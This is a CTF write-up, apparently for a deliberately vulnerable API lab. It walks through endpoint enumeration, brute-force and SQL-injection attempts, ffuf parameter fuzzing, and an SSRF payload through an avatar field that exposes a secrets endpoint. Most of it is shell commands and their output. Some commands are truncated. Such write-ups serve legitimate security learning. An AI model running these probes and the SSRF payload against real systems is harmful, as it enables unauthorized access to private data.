% export BASE_URL=''
We don’t get much for starters:
% curl ${BASE_URL}
API base located at /api/v1/
% curl ${BASE_URL}/api/v1
["Endpoint not found"]
I’ve been using dirsearch
( to
enumerate endpoints:
% python3 -u ${BASE_URL}
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12266
[15:15:36] Scanning:
[15:16:07] 200 - 3KB - /api/v2/swagger.json
Task Completed
That’s something! Off to a good start:
% curl --silent ${BASE_URL}/api/v2/swagger.json | jq
"swagger": "2.0",
"flag": "FLAG",
"info": {
We get a handful of endpoints:
% curl --silent ${BASE_URL}/api/v2/swagger.json | jq '.paths' | grep '^ "'
"/api/v2/user": {
"/api/v2/user/login": {
"/api/v2/admin/user-list": {
"/api/v2/user/posts/{id}": {
POST endpoint is unauthenticated - that’s promising. So is
, but that requires a username and a password (maybe
something to look at later).
% curl -d'username=pizza&password=pizza' ${BASE_URL}/api/v2/user
{"username":"pizza","flag":"FLAG","message":"User created go to \/api\/v2\/user\/login to login"}%
Let’s start a session as well:
% curl -d'username=pizza&password=pizza' ${BASE_URL}/api/v2/user/login
Let’s check out some endpoints:
% curl -H 'X-Session: edf12810e48a2bcf2d039b8d31851622' ${BASE_URL}/api/v2/user
% curl -H 'X-Session: edf12810e48a2bcf2d039b8d31851622' ${BASE_URL}/api/v2/admin/user-list
{"error":"Your user level needs to be an admin"}
% curl -H 'X-Session: edf12810e48a2bcf2d039b8d31851622' ${BASE_URL}/api/v2/user/posts/1
{"error":"Post does not belong to you"}
% curl -H 'X-Session: edf12810e48a2bcf2d039b8d31851622' ${BASE_URL}/api/v2/user/posts/2
{"error":"Post does not exist"}
Not much. What about those /api/v1
endpoints the home page mentioned?
% curl ${BASE_URL}/api/v1/swagger.json
["Endpoint not found"]
curl ${BASE_URL}/api/v1/login
["Endpoint not found"]
% curl -d'username=pizza&password=pizza' ${BASE_URL}/api/v1/user/login
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/admin/user-list
["Endpoint not found"]
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/admin/user-list
["Endpoint not found"]
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/user/posts/1
{"id":1,"post":"You got the Post: FLAG","analytics":"\/api\/v1\/post-analytics\/3c8a6664b8203c2e0b2b24972ccf5ce3"}
Alright! A flag, and a bonus endpoint to boot. Anything there?
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/post-analytics/3c8a6664b8203c2e0b2b24972ccf5ce3
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/post-analytics/
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/campaigns
["Endpoint not found"]
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/campaigns/
["Endpoint not found"]
% curl -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/campaigns/3c8a6664b8203c2e0b2b24972ccf5ce3
["Endpoint not found"]
Maybe worth exploring. Possibly something we can explore in the v2 API as well? Let’s put a pin in that for the time being. We’ve got three out of eight flags, let’s start back at the top
Let’s hit the API endpoints we know about with dirsearch
% python3 -u ${BASE_URL}/api/v1/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12266
[16:10:32] Scanning: api/v1/
[16:11:13] 200 - 132B - /api/v1/config
[16:11:13] 200 - 132B - /api/v1/config/
[16:11:39] 403 - 51B - /api/v1/secrets
[16:11:39] 403 - 51B - /api/v1/secrets/
[16:11:41] 200 - 13B - /api/v1/status?full=true
[16:11:41] 200 - 13B - /api/v1/status
[16:11:41] 200 - 13B - /api/v1/status/
[16:11:49] 400 - 49B - /api/v1/user
[16:11:49] 400 - 49B - /api/v1/user/
Task Completed
% python3 -u ${BASE_URL}/api/v2/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12266
[16:22:40] Scanning: api/v2/
[16:23:57] 200 - 3KB - /api/v2/swagger.json
[16:24:00] 400 - 51B - /api/v2/user
[16:24:00] 400 - 51B - /api/v2/user/
Task Completed
% # That's something!
% curl ${BASE_URL}/api/v1/config
Halfway there! That secrets endpoint looks interesting, too - I think if we can find a way to get admin access we could probably get a flag or two.
Is there a way to create an admin user? There might be an undocumented flag, or
maybe we can figure out the admin username and brute-force the password. The
error message we got was {"error":"Your user level needs to be an admin"}
% curl -d'username=admin&password=pizza' ${BASE_URL}/api/v2/user
{"error":"Username already exists"}
% # Neither of these produced users that could access ${BASE_URL}/api/v2/admin/user-list
% curl -d'username=pizza1&password=pizza&admin=true' ${BASE_URL}/api/v2/user
% curl -d'username=pizza2&password=pizza&level=admin' ${BASE_URL}/api/v2/user
Maybe brute-force? No luck with
for x in $(cat passwords.txt); do
echo ""
echo $x
curl -d"username=admin&password=${x}" ${BASE_URL}/api/v2/user/login
Maybe SQL injection? No luck with a handful of attacks:
% curl -d"username=admin&password='" ${BASE_URL}/api/v2/user/login
% curl -d"username='&password='" ${BASE_URL}/api/v2/user/login
% curl -d'username="&password="' ${BASE_URL}/api/v2/user/login
% curl -d'username="&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=@&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=*&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=../&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=;&password=asdf' ${BASE_URL}/api/v2/user/login
% curl -d'username=;&password=;' ${BASE_URL}/api/v2/user/login
% curl -d'username=/**;&password=;' ${BASE_URL}/api/v2/user/login
{"error":"Invalid username \/ password combination"}%
This isn’t working. This is a CTF with hints, so let’s take a look at those. Maybe we can edit our profile? Doesn’t look like we have anything on v2, but for v1:
% curl -XPUT -H 'X-Token: TOKEN' ${BASE_URL}/api/v1/user
{"error":"No updatable fields supplied"}
We don’t have documentation for this endpoint. What can we try?
What are some good nouns/verbs to use?
None of these worked. What am I missing? I read a write-up
that suggested you could use ffuf
to fuzz endpoints. Maybe we could find it that way?
I tried a number of options until I landed on something:
% history | grep ffuf
# Hindsight is 20/20 - these failed because ffuf default behavior is _matching_ on
# certain HTTP status codes, but we're looking for an HTTP 400 with a different error message.
1261 ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=asdf'
1262 ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=asdf' -fr '.*No updatable.*'
1264 ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=FUZZ' -fr '.*No updatable.*'
1265 ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=FUZZ' -fr 'error'
1267 ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=1' -fr 'http'
# Troubleshooting the matching issue - this matched everything.
1269 ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=1' -mr "updat"
# Finally, the correct incantation - `-mc "all"` matches all HTTP status codes.
1273 ffuf -w common.txt -X PUT -H 'X-Token: TOKEN' -u "${BASE_URL}/api/v1/user" -d 'FUZZ=1' -fr "upda" -mc "all"
That gets us the updatable field, which gives us a way to retrieve the “secrets” endpoint:
curl -X PUT -d"avatar=http://localhost/api/v1/secrets/" -H 'X-Token: TOKEN' "${BASE_URL}/api/v1/user"
{"error":"Non Image detected","example_data":"{\"private_key\":\"FLAG\"}"}
That’s a little sour, since I had to look up the answer. But, ffuf
seems useful!